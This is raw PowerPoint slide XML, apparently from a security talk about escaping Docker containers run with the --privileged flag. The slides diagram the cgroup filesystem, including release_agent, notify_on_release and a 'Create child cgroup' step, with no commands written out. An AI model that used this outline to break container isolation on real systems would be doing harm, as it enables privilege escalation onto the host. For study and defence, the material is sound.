        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>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6410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2C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Straight Connector 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="4072167"/>
            <a:ext cx="391519" cy="2098244"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="2098244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="209824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 name="Straight Connector 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="4072167"/>
            <a:ext cx="391519" cy="1262651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="1262651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="126265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Straight Connector 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444880" y="4493051"/>
            <a:ext cx="391519" cy="1677360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="1677360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="167736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Straight Connector 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444880" y="4493051"/>
            <a:ext cx="391519" cy="841767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="841767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="84176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Straight Connector 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444880" y="4447331"/>
            <a:ext cx="391519" cy="91440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="45720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="391519" y="4572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Straight Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444880" y="3651283"/>
            <a:ext cx="391519" cy="841767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="841767"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="841767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="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Straight Connector 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444880" y="2809515"/>
            <a:ext cx="391519" cy="1683535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="1683535"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="1683535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="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3" name="Straight Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="4072167"/>
            <a:ext cx="391519" cy="420883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="420883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519" y="42088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Straight Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="3651283"/>
            <a:ext cx="391519" cy="420883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="420883"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="420883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519"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5" name="Straight Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="2809515"/>
            <a:ext cx="391519" cy="1262651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="1262651"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="1262651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519"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Straight Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095760" y="1967748"/>
            <a:ext cx="391519" cy="2104419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="2104419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="195759" y="2104419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195759" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391519"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7" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2138160" y="3773633"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="2197011" y="2116717"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2197011" y="2116717"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 52"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2197011" y="2116717"/>
              <a:ext cx="1957599" cy="597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/sys/fs/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0" err="1" smtClean="0"/>
                <a:t>cgroups</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="1669214"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="12298"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="12298"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="12298"/>
              <a:ext cx="1957599" cy="597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memory</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="2510981"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="854065"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rectangle 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="854065"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="854065"/>
              <a:ext cx="1957599" cy="597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t>cpuset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="3352749"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="1695833"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="1695833"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="1695833"/>
              <a:ext cx="1957599" cy="597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devices</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="4194517"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="2537601"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="2537601"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="2537601"/>
              <a:ext cx="1957599" cy="597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t>rdma</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836400" y="2510981"/>
            <a:ext cx="2449840" cy="597067"/>
            <a:chOff x="6895251" y="854065"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="854065"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="854065"/>
              <a:ext cx="1957599" cy="597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t>cgroup.clone_children</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836400" y="3352749"/>
            <a:ext cx="2449840" cy="597067"/>
            <a:chOff x="6895251" y="1695833"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rectangle 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="1695833"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="1695833"/>
              <a:ext cx="1957599" cy="597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smtClean="0"/>
                <a:t>cgroup.procs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836400" y="4194517"/>
            <a:ext cx="2449840" cy="597067"/>
            <a:chOff x="6895251" y="2537601"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="2537601"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="2537601"/>
              <a:ext cx="1957599" cy="597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smtClean="0"/>
                <a:t>cgroup.sane_behavior</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836400" y="5036285"/>
            <a:ext cx="2449840" cy="597067"/>
            <a:chOff x="6895251" y="3379369"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="3379369"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="3379369"/>
              <a:ext cx="1957599" cy="597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t>notify_on_release</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6836400" y="5871878"/>
            <a:ext cx="2449840" cy="597067"/>
            <a:chOff x="6895251" y="4214962"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="4214962"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 34"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6895251" y="4214962"/>
              <a:ext cx="1957599" cy="597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smtClean="0"/>
                <a:t>release_agent</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="5036285"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="3379369"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="3379369"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="3379369"/>
              <a:ext cx="1957599" cy="597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t>pids</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4487280" y="5871878"/>
            <a:ext cx="1957599" cy="597067"/>
            <a:chOff x="4546131" y="4214962"/>
            <a:chExt cx="1957599" cy="597067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="4214962"/>
              <a:ext cx="1957599" cy="597067"/>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TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546131" y="4214962"/>
              <a:ext cx="1957599" cy="597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t>systemd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 53"/>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15194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836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="117" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2569312536"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-3176" y="1840230"/>
          <a:ext cx="10200121" cy="4812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2" name="TextBox 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9117157" y="2500861"/>
            <a:ext cx="2225963" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create child </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgroup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>33</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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7628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836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Escaping container Running with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="117" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3964666865"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-3176" y="1840230"/>
          <a:ext cx="10200121" cy="4812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2" name="TextBox 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9117157" y="2500861"/>
            <a:ext cx="2225963" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
